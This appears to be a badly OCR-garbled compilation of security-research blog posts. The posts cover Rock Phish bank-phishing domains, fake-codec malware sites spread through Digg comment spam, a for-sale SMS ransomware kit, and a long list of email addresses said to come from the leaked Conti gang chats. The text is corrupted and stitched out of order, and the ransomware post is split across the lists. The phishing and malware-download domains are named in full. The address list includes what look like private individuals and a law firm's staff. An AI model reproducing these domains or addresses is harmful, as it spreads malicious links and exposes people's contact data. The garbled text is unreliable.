[4]Bank of India Serving Malware 

[5]U.S Consulate in St.Petersburg Serving Malware 
[6]Syrian Embassy in London Serving Malware 
[7]CISRT Serving Malware 

[8]Compromised Sites Serving Malware and Spam 
[9]A Portfolio of Malware Embedded Magazines 
[10]Possibility Media’s Malware Fiasco 


[11]l See Alive IFRAMEs Everywhere 


ttp://ddanchev. blogspot .com/2007/06/massive-embedded-web-attack-in-italy.htm 


. http: //secunia.com/cve_reference/CVE-2006-0003/ 


ttp://ddanchev.blogspot.com/2007/07/icepack-malware-kit-in-action.htm 


1 
2 
3. 
4. 

5. 
6 

7 

8 

9 


_netp:/ /ddanchev. blogspot .con/2001 /09/syrian~embassy~in-London~ serving. nea 
| http:/ /adanchey. blogepot .con/2007/10/ciert~serving-aalvare. heal 

_hetp://ddanchev. blogspot .con/200T/10/compromised~sites~serving-nalware-and.htal 
_http:/ /adanchey.blogepot con/200T /10/portfolio-of-nalwvare~enbedded-nagazines. heal 


ttp://ddanchev. blogspot .com/2007/10/possibility-medias-malware-fiasco.htm 


11. http://ddanchev. blogspot .com/2007/11/i-see-alive-iframes-everywhere.htm 
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18.6.6 209.1 Host Locked (2022-06-14 14:15) 


NatWest 


OnLine Banking 


ONLINE CUSTOMER FORM 


Your Personal Details 

Pleare enter you Tile, First name, Middle name(s), Sumame, Home postcode and imal address 
Tale (MrAes/Ms/Other) 

Forst mame ——— 

Needie manneds) (if amy) * al 

Sermame [ 

Home postcode [ 

tmall address [ 


Your Banking Details 


Pleate enter you Customer Number (thus te pow 
ComUrR Muenbers, enter them all, separated by corneas) and Sort code! 


Costemer member 

PIN ——— 7) 
Password a 
Account member(s) — [as 
Sort code(s) ——_ 


cast Gate of birth (Sdrenyy) followed by you unique number which identifies you to the Bank), PIN, Pariwoed, Account number (# you have several 
del? you Neve several account members. enter all tort codes, separsted by commen) 


* indicahes an optional held 


I’ve been playing a cat and mouse game with the folks behind several different phishing cam- 
paigns using the Rock Phish kit for a while now, in between tracking down the [1]New Media 
Malware Gang and several other related malware campaigns. The Rock Phishers seem to keep 
track of this, and periodically change the default error message returned on a Rock Phish do- 
main. First it was "[2]209 Host Locked", than it became "[3]66.1 Host Locked", and how they’ve 
again changed it on a wide scale to "209.1 Host Locked". Try these : 


forceadd.com.ph 
goldline.org.ph 
paypal-accounts.com 
mtelnt.ac.cn 


Now, would you believe that due to outsourcing considerations NatWest Bank are now using a 
Siberian ISP? Naah, in your wicked dreams only! This campaign has been going on for the last 
24 hours : 


natwest.com.tx49.hk/onlinebanking/customerform.aspx 
natwest.com.tx40.hk/onlinebanking/customerform.aspx 
natwest.com.tx48.hk/onlinebanking/customerform.aspx 
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natwest.com.tx15.hk/onlinebanking/customerform.aspx 
natwest.com.tx47.hk/onlinebanking/customerform.aspx 
natwest.com.tx40.hk/onlinebanking/customerform.aspx 
natwest.com.iyeufv.org.ph/onlinebanking/customerform.aspx 
natwest.com.yeufv.ph/onlinebanking/customerform.aspx 


natwest.com.modifitool.kg/onlinebanking/customerform.aspx 


6584tw —— 


business-internet-banking.hsbc.com.yeufv.com.ph 


hsbe.com.yeufv.com.ph 


81.16,128.0/20 


myyeufv.net.ph oe * | a New NET 


a - — ~™ 4516343 
—A_ - A 4 
aol 81.16.131.40 oy. a [= 
———— wv ae 81.16.128.0 a 
—_ 28.0/22 
polro.ph git a erin 
- j 
m49.hk 
%55.hk Py, 
yeufv.com.ph ———— 


Now, let’s get back to the domain farms. The first one is located in CTS SIBERIA Complex 
Telematic Systems Joint Stock Company 53, Pisareva st , Novosibirsk, 630005, RUSSIA, at 
81.16.131.40 and is hosting : 


6584.tw 
business-internet-banking.hsbc.com.yeufv.com.ph 
hsbc.com.yeufv.com.ph 

myyeufv.net.ph 

polro.ph 

tx49.hk 

tx55.hk 


yeufv.com.ph 
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The second one is located in CL-ECSA-LACNIC ENTEL CHILE S.A. at 200.72.139.67, and the IP 
is acting as the main IP for a wide range of NS servers which further expand the domain farm. 
As I’ve already pointed out numerous times, Rock Phish is a great example of how centraliza- 
tion means, both, efficiency and easy of management, and an insecurity from the perspective 
that shutting down the IP will shut down the entire scammy ecosystem of over 30 Rock Phish 
domains hosting approximately from 5 to 10 different phishing campaigns targeting different 
brands on a single domain. Here’s another perspective on [4]the blended threat posed by 
phishing emails that come with embedded [5]banker malware, the results of which get later 
on aggregated in a [6]banking malware infected botnet only. Find out more about [7]trends 
and developments related to phishing in 2007 in a related article, and the Rock Phish kit in 
principle 


1. http: //ddanchev. blogspot .com/2007/12/have-your-malware-in-timely-fashion.htm 


2. http: //ddanchev. blogspot .com/2007/09/209-host-locked. htm 
3. http: //ddanchev. blogspot .com/2007/11/661-host-locked. htm 
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4. http://www. symantec .com/enterprise/security_response/weblog/2007/12/getting_acquainted_with_rock_p.htm 


5. http: //ddanchev. blogspot .com/2007/11/targeted-spamming-of-bankers-malware .htm 


. http: //ddanchev.blogspot .com/2007/11/metaphisher-malware-kit-spotted-in-wild.htm 


. http://www.windowsecurity.com/articles/Phishing-Metamorphosis-2007-Trend-Developments.htm 


18.6.7 Fake Codec Serving Domains from Digg.com’s Comment Spam Attack 
(2022-06-14 14:15) 


icemim 
A 2B year-old person who jomed Digg on Jaruary 214, 2009 


Profile Friends’ Activity History 
<a scare OF 
- — SD mM recom actiery 
Search for i Al Sectors ¥ | Oo | 
or 
Showng Coererants all sections © suterts ssn 


B streets cent ty memin 


4 Seer ad Dowbt : , OY tavottes 
 Comnemert in Mews 


) pretite actieny 


maz Vaich The Vrrestler onbkne § ve wt hilo /brokerty cn/brosd 


ee 4 Watch Hetel fee Dogs’ move online for FREE! 
a . Comment in Hews 
ant 


ay Watch Hotel For Dog 
3 Comment tn Hews 


The [1]following assessment details all the redirectors, fake codec serving domains, as well as 
related fake security software domains used in the [2]Digg.com’ comment spam attack. 
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IP Address Original Name 


golden-portal.us 


8.109.20.50 


The complete list of the domain redirectors used in the comment spam attack: 


worldnews-video .com - 459,000 bogus comments 
youtube-top-video .com - 98,000 bogus comments 
new-videos .info - 92,500 bogus comments 
film-man .com - 50,700 bogus comments 
last-sex-news .com - 26, 000 bogus comments 
video-news .cn - 25, 500 bogus comments 
last-porno-news .com - 21,500 bogus comments 
fresh-video-news .com - 10,900 bogus comments 
broken-tv .com - 10,000 bogus comments 
video-trailers .net - 8,370 bogus comments 
exclusive-videos .net - 7860 bogus comments 
funkytube .net - 6,170 bogus comments 
shocking-stars .net - 2,600 bogus comments 
cinemacafe .tv - 1560 bogus comments 
watch-video .cn - 3000 bogus comments 
vidstream .cn - 397 bogus comments 

divgg .com - 174 bogus comments 

golden-portal .us - 3040 bogus comments 
tubedirects .net - 290 bogus comments 
funkytube .net - 6,480 bogus comments 
watchepisodes .cn - 331 bogus comments 
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Apakerp yc 
Hapyuennud 


Technical information: 


** STOP: Gx@@SOO0Cs (Rc O0000RRC, exeeeeeens, Gx ONR0NNRD) 


TIOCU BOCCTANOONTL PASOTOCMOCOEMOCTL BauerO KOMmbeTepa Ban CAtAyeT CACAATL CACAyuure: 


Bucop cTp ame: 
flan Poccum otnpasbte SMS c TekcTom © 90) Ha 


menannet Crommocts Coocarees 58 qentoe. 


© OTHCTHON SIS-coodeemee KON eecante o nose 


Technical information; 


ve STOP: Gx@@OO0RCs (Rc OO000ETC, Exeeeeeens, ax eNRnnnRe) 
eee STOP: cO®S887b Unknow: Bard Error Unknown Hard Errer Beginning dunp of physical monory 


Remember the [1]ransomware variant that was locking down user’s PCs and demanding a 
premium SMS in order for them to receive the unlocking code? 


In an attempt to further monetize the "innovative" practice of converging Windows-based 
malware and premium SMS numbers operated by the cybercriminals, a do-it-yourself version 
of the ransomware is currently offered for sale for a mere $15. 


Here are some of its features: 

- When executed presents the uset with a Blue Screen of Death style error message 

- Asimple auto-loading feature ensuring it will load every time the host is rebooted, completely 
disables the startup shell in order to become the first application to appear upon reboot 

- Disables Windows Task Manager, Registry Editor, default shortcuts for terminating a program 


The vendor would also like to remind its customers that "the application is for educational 
purposes only", next to a comment on how all of their current customers are fully satisfied 
with the money they’re making by locking infected user’s PCs. This piece of ransomware 
has been spreading across the Russian web space since April, and with its source code now 
offered for sale, it’s only a matter of time before the error messages get localized to multiple 
languages courtesy of [2]localization on demand cybercrime-friendly services breaking any 
language barrier for a spam/malware campaign. 


However, from an operational security (OPSEC) perspective which | often emphasize on 
in order to demonstrate how efficient cybercrime facilitating tactics increase the probability 
of successfully tracking down the people behind a particular attack, this premium SMS based 
ransomware tactic is exposing the people behind the campaign much easily due to its reliance 
on a mobile operator, compared to GPCode’s virtual money exchange approach ([3]Who’s 
behind the GPcode ransomware?) which given they put enought efforts, the process can be 
virtually untraceable. 
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IP Address * Original Name 


golden-portal.us 


119,150 
119.150 
omeia.info 


umbulepon.com 


bestlive-tv .cn - 216 bogus comments 

svtube .cn - 222 bogus comments 
onlyhotvideos .com - 413 bogus comments 
celebnudestars .net - 326 bogus comments 
usatvshows .us - 41 bogus comments 
vidstream .cn - 398 bogus comments 

divgg .com - 171 bogus comments 

tubedirects .net - 285 bogus comments 
yuotnbe .com - 370 bogus comments 

omeia .info - 769 bogus comments 
video.stumbulepon .com - 669 bogus comments 
shocking-stars .net - 2,650 bogus comments 
sowonder .net - 3000 bogus comments 
sex-tapes-celebs .com - 2,210 bogus comments 
video-sensation .com - 1,690 bogus comments 
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0.140,56 


0.140.56 
0.140.56 
0,140.56 
0,140.56 


Currently active download locations for the fake codecs, and the rogue security software: 
vivaextra .com 
tube-xxx-tv2009 .com 
onlinestreamsofware .com 
demoextra .com 
best-tube-2008 .net 
tubeportalsoftware2008 .com 
tubesoftwareviewer2008 .com 
exefilesdownload2009 .com 
tubesoftwareviewer2009 .com 
uporntube-07 .com 
tubeporn08 .com 

uporn-tube .com 
uporntube2009 .com 
porn-tube09 .com 

tubeporn09 .com 
xxxporn-tube .com 
porntubenew .com 

ultra-extra .com 

Xxp-police .com 

Xp-police-av .com 
xp-police-2009 .com 
antiviralscanner14 .com 


Detection rates for the codecs/rogue security software: 
[3]viewtubesoftware.40020.exe 

Result: 8/39 (20.51 %) 

File size: 71680 bytes 

MD5...: ef26250b946a63112659c94eed016e0d 

SHA1..: 902fd30cd4a7465c9f5271971604d273ed74a60c 


[4]viewtubesoftware.400201.exe 

Result: 7/39 (17.95 %) 

File size: 62464 bytes 

MD5...: 1d4c3a6d2cc8c645652f7090636e5a4b 

SHA1..: ccc1994a521d9e8a053a345b9d9cc28a63415845 
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[5]Install.exe 

Result: 5/39 (12.82 %) 

File size: 77830 bytes 

MD5...: 64557f21c50b6c063cc96ba661bcd27c 

SHA1..: 5a765a92de07af756c96c83139be8ddacell17efl 


[6]installl.exe 

Result: 4/39 (10.26 %) 

File size: 73222 bytes 

MD5...: 890bf32b34b7abab7aa7ea049215c429 

SHA1..: 8¢311a8b6096914f758bcaf82aca465bcc885110 


The first comments including links to these domains have been posted at Digg.com on 
January, 2008 - over an year ago. 


1. http://pandalabs.pandasecurity.com/archive/Have-you-ever-heard-the-term-_2200_Rickrolling_ 22003F00_-Malwa 


2. 

3 

4 

5. 

6. 

18.6.8 A Compilation of Known Conti Ransomware Gang Personal Email Address Ac- 
counts - An OSINT Analysis (2022-06-19 19:58) 


[1] 


oy 


¥ 
SRP ee ° 
% q 


How does going through the recently leaked internal Conti Ransomware gang communication 
really feels in terms of data mining? Keep reading. 


I’ve decided to dig a little bit deeper based on the original leaked internal Conti Ransomware 
Gang communication and share personal email address accounts found in the actual leaked 
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communication with the idea to assist everyone including researchers vendors and organiza- 
tions including U.S Law Enforcement on their way to track down monitor and prosecute the 
cybercriminals behind these campaigns. 


Sample Conti Ransomware Gang related personal email address accounts include: 
catuta@tuta.io 
foundun@protonmail.com 
max3100@protonmail.com 
warabail@tutamail.com 
pharaon78@tutanota.com 
batrade@mail.ru 
ccncco@protonmail.com 
husbrand@protonmail.com 
songteng@tutanota.com 
dastin707@protonmai.com 
timman@tutanota.com 
exploitdb@exploit.im 
volhvb@exploit.im 
ivanalert@jabber.ru 
ela@jabber.otr.im 
flip@avtonom.org 
vasyamilov@thesecure. biz 
dail@jabber.sk 
cosm123@xmpp.jp 
vkaryagin@jabber.ru 
flavius@thesecure. biz 
nsummer@jabberpl.org 
alexeipi@jabber.ru 
duhastich@jabber.ru 
nsjxlc@safejid.com 
m2686@jabber.ru 
karmeone@ro.ru 
mustanota@tutanota.com 
nggfhfhhvcfdhgjyg 7t88958685@gmail.com 
joseph.jacqueline@mail.ru 
nminakerawatsonn@gmail.com 
ncatuta@tuta.io 

22316 


sdferwMelissaJBurke3513fghsad@protonmail.com 
nolobanstok1999vanahear@protonmail.com 
maxhalikus@xmpp.ru 
baton@xmpp.jp 
batono@xmpp.jp 
nPtuva8712@maail.ru 
ndog3112@outlook.de 
ncurtgaebriel@gmail.com 
nprtwin02@yahoo.com 
nnicolas.veneziale@gmail.com 
nmahesha88@hotmail.com 
nchrisduffy17@gmail.com 
n25novitskiy@gmail.com 
nplongel1@googlemail.com 
nbayle.docsavage@gmail.com 
njaymurray.murray@gmail.com 
nicarus __83@hotmail.com 
njaredkahI22@gmail.com 
nryan.stuart.011@gmail.com 
ncc33dfg9@hotmail.com 
npazwhyte@gmail.com 
njeroenmooijman@hotmail.com 
newera@keemail.me 
ostofford@protonmail.ch 
dasix@protonmail.com 
hurecer@rambler.ru 
johnsher@protonmail.com 
tunnep@protonmail.com 
oxu@ro.ru 

huazo@lenta.ru 
freeos2@yandex.ru 
freeos2@tuta.io 

dastoon@ro.ru 
okx@keemail.me 


nMoniqueLArmwood2534sdf@protonmail.com 
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nverstevelney1994lingcandgolf@protonmail.com 
dastom@ro.ru 

gremat@rambler.ua 
nws1980@protonmail.com 

guliver@xmpp.sh 

goldcoin@exploit.im 

nmuroru@ro.ru 

jabelon@jabber.ru 

valerius2k@jabber.ru 

beautifullife@jabber.ru 

geralemur@olddot.net 
humminghead@jabber.ru 
ebaxmg3lpi@mail.ru 
asdKimbraSBrown5684dfgrecvbf@protonmail.com 
nimertracsing1988mubapea@protonmail.com 
SusanJMcCauley1457bvn@protonmail.com 
ndistmissfighster1967neydweelrie@protonmail.com 
nTiffany)JPacheco454dfg@protonmail.com 
nungamarme1994unfiphy@protonmail.com 
nardenbirdie@protonmail.com 
nranorsliphol953brocored@protonmail.com 
arnfinnr@exploit.im 

faster _1963@xmpp.jp 

yastreb@exploit.im 

mario2bebi@jabb.im 
ndaihudketa1986@protonmail.com 
nkendpracpahal1986@protonmail.com 
daihudketa1986@protonmail.com 
Imcgee@bricknerfamily.com 
eraven@keemail.me 
gareuma@protonmail.com 

muroru@ro.ru 

mikroon@lenta.ru 

nomom@tutanota.com 
askorvine@protonmail.com 
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obiscope@ro.ru 
unodetune@tutanota.com 
ndonnaj113300@gmail.com 
zholbolat.temirlan@gmail.com 
segej.ivanov001@mail.ru 
torres-claudia@email.com 
susannestephens84@myself.com 
macocina@rambler.ru 
takrainskaya@rambler.ua 
ubeou@ro.ru 

stagov@lenta.ru 
huanlyu@keemail.me 
askalina@rambler.ua 
wanwone@rambler.ua 
oremiazero@keemail.me 
norwayinbay@mail.com 
bjaqer@bk.ru 
coopertinojam@gmx.com 


begemot sun@jabber.ru 


nchriswoakes888@protonmail.com 


nprobacimmus1987@protonmail.com 


marxkarl777@protonmail.com 
dictyna@tssssss.info 
ramilramil@protonmail.com 
nafasd@asda.com 
acava@ro.ru 
baerd90@bk.ru 
Rsebas@mail.com 
kroundarey@keemail.me 
watota@tutanota.com 
Zazzn@ro.ru 

nkvdvs@bk.ru 
wonto@tuta.io 
antasasia@ro.ru 


alkalane@autorambler.ru 
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awalays@protonmail.com 
nmarkallen888@protonmail.com 
nsandlolyholl1976@protonmail.com 
nmaxallen938@protonmail.com 
ntibelltalcol989@protonmail.com 
nerideline@keemail.me 
ggfhfhhvcfdhgjyg7t88958685@gmail.com 
utuit@ro.ru 

buer@thesecure.biz 
highping@ro.ru 
saintanny@gmail.com 
3000t@protonmail.com 
vouvom@ro.ru 
tadamom@protonmail.com 
88teo@tutanota.com 
benstokesOO00@protonmail.com 
te4al@ro.ru 

cueno@ro.ru 
samuam@tutanota.com 
onarotade@tutanota.de 
ballao@list.ru 
wandone@protonmail.com 
badroom@keemail.me 
dandau@ro.ru 
nmaxhead777@protonmail.com 
nululnefarc1985@protonmail.com 
milanmarley@protonmail.com 
nalexcrypt@neko.im 
nmilanduke666@protonmail.com 
ntasihighphal979@protonmail.com 
nmilanmarley@protonmail.com 
nmorttigolal1979@protonmail.com 
ngraddds@xmpp.jp 
33barom@tutanota.com 


argontom@tutanota.com 
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wma@rambler.ua 
vselenamut@protonmail.com 
clauz@xmpp.jp 
auchie@protonmail.ch 
ericmeric@protonmail.com 
osteru@ro.ru 

osunc@ro.ru 
separatorl12@protonmail.com 
kiioto@ro.ru 
wertuone@rambler.ua 
unimore@keemail.me 
tramolta@lenta.ru 

waroru@ro.ru 

trutu@tuta.io 
gregony@protonmail.com 
egenta@lenta.ru 

Maniaro@ro.ru 
hookam@autorambler.ru 
onemail@keemail.me 
keiblemuel84132@gmail.com 
nwonto@tuta.io 
ululnefarc1985@protonmail.com 
ragessaflen@yahoo.com 
melis-13@yandex.ru 
nconsracvidel1973@protonmail.com 
nsubsroreascal988@protonmail.com 
nfantdotmufflung1974@protonmail.com 
nalinposol974@protonmail.com 
upuna@rambler.ua 
nasutina@mail.ua 
wsawsa@rambler.ua 
zantorino@keemail.me 
resloman@tutanota.com 
mesccuo@rambler.ru 


karlmarxO00@protonmail.com 
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nmeatfcomptroznal1977@protonmail.com 
nposeytobin777@protonmail.com 
nzlatruonuchand1972@protonmail.com 
nglennmartin876@protonmail.com 
nulocuref1983@protonmail.com 
nwoakescolin@protonmail.com 
nenpresbardio1971@protonmail.com 
nkitshaw5@protonmail.com 
nbartofestge1973@protonmail.com 
nchriswoakes851@protonmail.com 
nfollvipostre1974@protonmail.com 
ndanebirch9@protonmail.com 
nisretelal9@protonmail.com 
nhalegarrison77@protonmail.com 
nbeaucombcomli1987@protonmail.com 
ndanelavender268@protonmail.com 
ndowncanjacksec1984@protonmail.com 
njmax3946@protonmail.com 
nfansadirfdenl1971@protonmail.com 
jmax3946@protonmail.com 
larosfages@gmail.com 

dari7070@ro.ru 

cuprum@keemail.me 
berstiminec1979@protonmail.com 
nslanalinob1977@protonmail.com 
thalegarrison77@protonmail.com 
imikitka@protonmail.com 
nholdway@dailyherald.com 
dsaind@tuta.io 

turnsa@rambler.ua 

diamore@ro.ru 
etsumiutsumi@gmail.com 
etsiujttsumi@hotmail.com 

trev@f.com 


qrasawa@tutanota.com 
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Despite the fact that vendors have already released [4]unlock code generators for the 
SMS ransomware, taking into consideration the potential for widespread ransomware cam- 
paigns through the now ubiqitous revenue generator in the form of scareware ([5]Scareware 
meets ransomware: "Buy our fake product and we'll decrypt the files"), the concept is not 
going away anytime soon. 


Related posts: 

[6]Mobile Malware Scam iSexPlayer Wants Your Money 
[7]New mobile malware silently transfers account credit 
[8]New Symbian-based mobile worm circulating in the wild 


. http://blogs.zdnet.com/security/?p=319 

. http: //ddanchev.. blogspot . com/2008/11/localizing-cybercrime- cultural . html 

. http: //blogs.zdnet .com/security/?p=1259 

. http://news .drweb.com/show/?i=304k&c= 

- http: //blogs .zdnet .com/security/?p=3014 

. http: //ddanchev. blogspot . com/2008/07 /mobile-malware- scam-isexplayer-wants html 


. http://blogs.zdnet.com/security/?p=241 
. http: //blogs.zdnet .com/security/?p=261 
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ta.dubling@protonmail.com 
tqx.rock@protonmail.com 
ts.gulfeg@protonmail.com 
tbenj1987@protonmail.com 
gurtan@keemail.me 
log.foreman@biendongpoc.vn 
ndksfhsifgisldfcvxz@mail.ru 
ncjhfvdjhgfshbf@mail.ru 
nbbdfhguygfes@mail.ru 
ndacjvhjicdgfvi@mail.ru 
nmichajfbahsdfga@mail.ru 
nconsfronepun1983@protonmail.com 
nhawhunrocu1982@protonmail.com 
99totu@rambler.ua 
kgarot@gmail.com 
nbonen109@mail.ru 

nguru@mail.ru 
hose007@protonmail.com 
milwerta@tuta.io 
patrik80@tutanota.com 
myagra@rambler.ua 
saulgdmn@jabb.im 
plaguedoc@shangryla.net 
tsbarber20@protonmail.com 
tdubfin@protonmail.com 
tbswitch34@protonmail.com 
dediserv@tutanota.com 
rasovserzh@mail.ru 
viabio@rambler.ua 
irutel88@lenta.ru 
consfronepun1983@protonmail.com 
legal@protonmail.com 
niosnupicinl1987@protonmail.com 
nkeatenounraff1984@protonmail.com 


nwechlibolslenl1976@protonmail.com 
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npeycetdisal971@protonmail.com 
ntuicourcentbig1987@protonmail.com 
npecverbchopo1977@protonmail.com 
ngrestedrepar1989@protonmail.com 
ntastbutpchidel1988@protonmail.com 
nsiokitiphil973@protonmail.com 
nleyramimul1975@protonmail.com 
nliotooncobed1981@protonmail.com 
ntradaglandisc1973@protonmail.com 
nstamvermigo1981@protonmail.com 
nmemdehatel1988@protonmail.com 
nguaysularigh1979@protonmail.com 
nstunanitin1984@protonmail.com 
nkannpheforre1975@protonmail.com 
noutucgetsil989@protonmail.com 
nodintodoul1971@protonmail.com 
nbeimezemste1970@protonmail.com 
ixoxo@tuta.io 

taota@tuta.io 
33tadamom@tutanota.com 
tparkernode@protonmail.com 
tstive772q@protonmail.com 
Thorley.Narayanan7147680@gmx.com 
emailbases@jabber.org 
diez@exploit.im 
stamvermigo1981@protonmail.com 
nniosnupicin1987@protonmail.com 
ncloverlilac7876@protonmail.com 
nrefitzrengold1977@protonmail.com 
ndilanmarley6@protonmail.com 
nglucicerol1970@protonmail.com 
nmilananson2@protonmail.com 
nnumsunoder1974@protonmail.com 
nginomiller804@protonmail.com 
ntiicocessqual988@protonmail.com 
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ndilanmarley8@protonmail.com 
nlinksibnuwill988@protonmail.com 
nposeylavender@protonmail.com 
ntiovomofal984@protonmail.com 
narescortez70@protonmail.com 
nquithirsretal978@protonmail.com 
nhalekitl59@protonmail.com 
nhighcostnafil978@protonmail.com 


nforrestdane79@protonmail.com 


nAndrea.Davis.1989@protonmail.com 


natlasjairO@protonmail.com 
nclarrestpotol1976@protonmail.com 
codd.nexus@jabb.im 
tlloyid.hyman@protonmail.com 
kannpheforre1975@protonmail.com 


wellproxadsit1980@protonmail.com 


nRethmanMarlicia4ah@protonmail.com 


reuclothanid1972@gmx.fr 
nChasenRuest@protonmail.ch 
Terri pacrytikel1988@ziggo.nl 
nDetrolioNichols@protonmail.com 
Reed _22161@telenet.be 
nClariceDesantis@protonmail.com 
Wayne _Bosse17@lycos.com 
nErnoGreggory@protonmail.com 
Bradley Fullerl1@sky.com 
nYasminCapshaw@protonmail.com 
Baldwin _16367@interia.pl 
nWhitmeyerRory@protonmail.com 
Brian _Tsosie@sino.com 
nBrandnBuddie@protonmail.com 
Neil tersudozal1987@yahoo.com.my 
nLineaBohmer@protonmail.com 
Johnson _78465@yahoo.com.br 
nDaninaCassady@protonmail.com 
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Jose _riepitingmet1987@att.com 
nNasheaJahn@protonmail.com 
Alexandra Belanger21@126.com 
nBellefleurKimika@protonmail.com 
Colin Fleming@web.de 
nArissaCreedon@protonmail.com 
Traci _Jones@meta.ua 
highjob@protonmail.ch 
Marcel.Pohlmann@brillant-holding.de 
sapehanti1988@protonmail.com 
forronessvil974@protonmail.com 
pilmotemta1986@protonmail.com 
bot@uaps.so 
katiel1980@163.com 
nviolett1965@163.com 
nkalliel1974@163.com 
nsammuel1994@163.com 
nkatrin1990@163.com 
ntaylorel1988@163.com 
nbeverley1990@163.com 
npatrik1991@163.com 
nsimono1997@163.com 
nsamon1964@163.com 
nvalery1968@163.com 
ndarik1981@163.com 
nfreddy1999@163.com 
ngarold1995@163.com 
nhennry1974@163.com 
njarry1977@163.com 
nkavinl1971@163.com 
nlarriel978@163.com 
nloren1981@163.com 
nmarry1977@163.com 
nphilipp1992@163.com 
npaulll1974@163.com 
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nesher1985@163.com 
njennief1985@163.com 
nmichal1976@163.com 
nandreal968@163.com 
nsamuell1987@163.com 
ngillbertl1983@163.com 
nsarral1989@163.com 
njanny1966@163.com 
buwormeki1977@protonmail.com 
nsapehanti1988@protonmail.com 
nkrezovouzer1979@protonmail.com 
npilmotemta1986@protonmail.com 
nplenforsiowo001975@protonmail.com 
ngeupajavull1976@protonmail.com 
nlaiwingcider1977@protonmail.com 


louigarlufeal984@protonmail.com 


nwingthampgouffkerp1980@protonmail.com 


nwellproxadsitl1980@protonmail.com 
npegasusR87@protonmail.com 
ntempmullugold1987@protonmail.com 
nbob.to@zoho.com 
nlouigarlufeal984@protonmail.com 
nbuwormeki1977@protonmail.com 
nvestzagceled1984@protonmail.com 
nfresnoequipmentit@gmail.com 
nversmohubfast1972@protonmail.com 
nceslingvafil973@protonmail.com 
njesser20@protonmail.com 
nsanctornopul1986@protonmail.com 
nringpawslanin1984@protonmail.com 
USERNAME@github.com 
tnodex08@tutanota.com 
tKasazhtiklon@yahoo.com 
tVakomsyurebf@yahoo.com 


npepvtui9@jabber.cz 
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proxylist4you.com@sj.ms 
support@sockshub.net 
nproxybuy@jabber.ru 
nanyproxy@jabbim.pl 
nsupport@sockshub.net 
nproxysup@jabber.ru 
pulyamaster@xabber.org 
nbigstarsforever@protonmail.com 
nnicenphacock1976@protonmail.com 
nsurguitenvel986@protonmail.com 
ntersgkiragpa1971@protonmail.com 
n19john84galt@gmail.com 
nirchascandzard1985@protonmail.com 
nritithemlal1970@protonmail.com 
nmengalicall988@protonmail.com 
danecarla7@protonmail.com 
nzudistranial985@protonmail.com 
njosekarl317@protonmail.com 
ntersanscirval974@protonmail.com 
ngarybanton66@protonmail.com 
njesroysqualhand1974@protonmail.com 
ngaryjose777@protonmail.com 
nilplugorphar1978@protonmail.com 
ngarymartin777@protonmail.com 
nbutthotchcorngamb1981@protonmail.com 
nmaxmartin777@protonmail.com 
nireltisul1969@protonmail.com 
ngarywhite777@protonmail.com 
naweetsnark@protonmail.com 
nmaxgary777@protonmail.com 
nranosfinger@protonmail.com 
njohnmax82960@protonmail.com 
nlyeevcorn@protonmail.com 
nblythebirdie7866@protonmail.com 
nkimouqbone1982@protonmail.com 
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nkatsupport@protonmail.com 
nbositasil986@protonmail.com 
ngaiterberesp1986@protonmail.com 
loaloverre1984@protonmail.com 
skanwatemit1972@protonmail.com 
nal2s34d56f78@outlook.com 


nbentderstlinpart1987@protonmail.com 


nconcbuzzmittcou1982@protonmail.com 


vho2017@ya.ru 

rete4@ro.ru 

nsupport@wormjim.net 
Andrea.Davis.1989@protonmail.com 
ken.kowal@fieldsauto.com 
tolores@rambler.ua 
max@n4iaacb37wma«aclht.onion 

arb _reserved@ubuntu-jabber.de 
masscrypt@exploit.im 

abiroid@ro.ru 

nnuun@ro.ru 

2ram@ro.ru 
nscot.townshend@protonmail.com 
nskyjconphonal975@protonmail.com 
nwindpotabpa1978@protonmail.com 
nallen3421frank8723@gmail.com 
nmentsetomal971@protonmail.com 
nmetilencong1985@protonmail.com 
nolivaswal985@protonmail.com 
get.u@inbox.ru 
norangeapple341@mail.com 
maxmartin777@protonmail.com 
dreom@ro.ru 
brett.ivanov@yandex.ru 
naasa@jabber.sk 
andreadavis1989@protonmail.com 


biceps@deshalbfrei.org 
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bomba777@exploit.im 
angosusdand1987@protonmail.com 
nbanzum@protonmail.com 
nStephanieBrown27@protonmail.com 
nbikrut@protonmail.com 
nintiloten1983@protonmail.com 
ncetitobelt1970@protonmail.com 
nhildsandfilmrock1980@protonmail.com 
nwickglycroundmea1973@protonmail.com 
nangosusdand1987@protonmail.com 
a/77ap@ro.ru 

tToarsichelen@yahoo.com 
tSchatodalsaz@yahoo.com 
tChaadlinonzh@yahoo.com 
ssbee@keemail.me 
romhambjummi1991tenloke@protonmail.com 
nzikegnyarail992alkaabeau@protonmail.com 
epacbesett1985@protonmail.com 
nccbn521@gmail.com 
nginutdomal1981@protonmail.com 
narregagkest1987@protonmail.com 
flatunriral985@protonmail.com 
user@gmail.com 
minakerawatsonn@gmail.com 
minakersonn@hotmail.com 
nbingoteamneverdream@protonmail.com 
garymartin777@protonmail.com 
nfolkam@protonmail.com 
ngokcin@protonmail.com 
nfolkum@protonmail.com 
ngotkin@protonmail.com 
nDaveglidinerib1972@protonmail.com 
nbolkum@protonmail.com 
ngikrum@protonmail.com 


nkoolum@protonmail.com 
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tenonises1980@protonmail.com 
ntsoutinerlal975@protonmail.com 
nchoforcioglyc1982@protonmail.com 
ncrabomtotxyal1980@protonmail.com 
nchondstatcipop1973@protonmail.com 
ncircaherrchil1988@protonmail.com 
nworlspirexel1971@protonmail.com 
nsandnalure1985@protonmail.com 
nhelreteral970@protonmail.com 
ntreetennuga1l970@protonmail.com 
tLegatmenoekl@yahoo.com 
tKesoranen@yahoo.com 
tNoeralizoueg@yahoo.com 
tKekogsakchun@yahoo.com 
johnmax82960@protonmail.com 
pravdazanami@exploit.im 
glenolson003@gmail.com 
necjefhysu1973@protonmail.com 
nJessica.Harris.1991@protonmail.com 
gina@calahanlaw.com 
fran@calahanlaw.com 
Anna@calahanlaw.com 
Valeri@calahanlaw.com 
casey@calahanlaw.com 
amileigh@calahanlaw.com 
erica@calahanlaw.com 
stephanie@calahanlaw.com 
Blair@calahanlaw.com 
Rachel@calahanlaw.com 
ninsepotal984@protonmail.com 
nlighrebalfail974@protonmail.com 
njhomsmith888@protonmail.com 
nlistun@protonmail.com 
nmirtum@protonmail.com 


fedrone@ro.ru 
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abuse-contact@publicdomainregistry.com 
mokrik@protonmail.com 
superuser2717@gmail.com 
nepacbesett1975@protonmail.com 
ncrazzyygoeshbeverly@protonmail.com 
nnisums@protonmail.com 
nnotums@protonmail.com 
support-1l00@exploit.im 
dickmor@protonmail.com 
ndinojia@protonmail.com 
nemmypop@protonmail.com 
